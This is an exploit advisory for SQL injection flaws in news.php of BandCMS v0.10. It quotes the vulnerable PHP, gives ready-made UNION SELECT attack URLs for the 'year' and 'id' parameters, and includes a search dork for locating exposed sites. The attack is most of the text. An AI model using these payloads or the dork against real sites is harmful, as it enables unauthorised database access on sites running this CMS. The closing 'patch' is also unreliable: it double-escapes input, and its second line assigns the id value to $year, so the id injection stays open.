################################################################# # _______ _________ _ # # ( ____ )\__ __/( ( /| # # | ( )| ) ( | \ ( | # # | (____)| | | | \ | | # # | __) | | | (\ \) | # # | (\ ( | | | | \ | # # | ) \ \__ | | | ) \ | # # |/ \__/ )_( |/ )_) # # http://root-the.net # ################################################################# #[+] BandCMS v0.10 news.php Milti SQL Injection Vulnerabilities # #[+] Vendor : http://rockband.sourceforge.net/ # #[+] Exploit : Affix <root@root-the.net> # #[+] Dork : "Powered by Rock Band CMS 0.10" # #[+] Greetz : Mad-Hatter, Atomiku, RTN, Terogen, SCD, Boxhead, # # str0ke, tekto, raT, uNkn0wn.ws, ryan1918.com # ################################################################# # BandCMS v0.10 Has an SQL Injection in news.php # # # # Code : # # if(isset($_GET['year'])){ # # $year = $_GET['year']; # # $smarty->assign('news', $db->getNewsYear($year)); # } # # # # # # Exploit : # # http://site.com/news.php?year=-2004+UNION+SELECT+1,2,3,4-- # # # # # Code : # # $id = $_GET['id']; # # $newsItem = $db->getNewsItem($id); # # $smarty->assign('news', $newsItem); # # # # Exploit : # # http://site.com/news.php?id=-1+UNION+SELECT+1,2,3,4-- # # # # # # Patch : # # Since Im a Nice guy here is a change both variables as # # follows # # # # $year = addslashes(mysql_real_escape_string($_GET['year'])); # # # # $year = addslashes(mysql_real_escape_string($_GET['id'])); # # #################################################################